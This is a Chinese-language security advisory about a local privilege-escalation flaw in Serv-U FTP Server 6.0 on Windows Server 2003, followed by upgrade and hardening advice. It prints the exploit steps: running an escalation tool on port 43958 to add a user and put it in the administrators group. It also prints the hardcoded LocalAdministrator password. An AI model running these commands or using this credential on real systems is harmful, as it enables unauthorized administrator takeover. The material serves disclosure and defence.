Serv-U的如下漏洞防范

核心提示： 漏洞危害：Serv-U存在设计问题，本地攻击者可以利用这个漏洞以SYSTEM权限在操作系统上执行任意命令，Serv-U的如下漏洞防范(3)，测试环境：Microsoft Windows Server 2003, Enterprise Edition+Serv-U FTP Server 6.

漏洞危害：Serv-U存在设计问题，本地攻击者可以利用这个漏洞以SYSTEM权限在操作系统上执行任意命令。

测试环境：Microsoft Windows Server 2003, Enterprise Edition+Serv-U FTP Server 6.0.0.2

测试过程：

第一步：以普通用户身份登录Windows，在开始菜单的运行窗口中输入cmd，在命令提示符下输入Serv-U6(运行Serv-U6本地提升权限工具，见图1)：

输入serv-u6.exe 43958 “net user test test /add”，添加一个名为“test”的用户。

第二步：接着输入serv-u6.exe 43958 “net localgroup administrators test /add”将该账户提升为超级用户权限，如果成功，那么软件界面将会返回提示信息

<220 Serv-U FTP Server v6.0 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

这个时候，你可以使用用户名test，密码test进行登录了，并且发现自己已经成为超级用户了，这里不需要再说明什么了，你已经拥有了系统的超级权限了，入侵者已经可以在你的电脑上为所欲为了。

漏洞解决方案：尽快升级到最新版本，由于此本地提升权限漏洞为软件设计问题，并非程序出现异常。

安全对策

Serv-U安全隐患重重，那么如何才能防范入侵呢？笔者以Windows 2003 Sp1系统、NTFS分区为例，在保证系统安装好最新补丁的情况下，来对系统进行安全部署。首先安装Serv-U最新版本于非系统分区，由于默认情况下系统盘的一些目录都被赋予了everyone权限，这给攻击者在获取Webshell的时候执行攻击程序提供了环境。安装过程很简单，注意安装过程中是否有必要设置匿名登录，否则禁止匿名登录。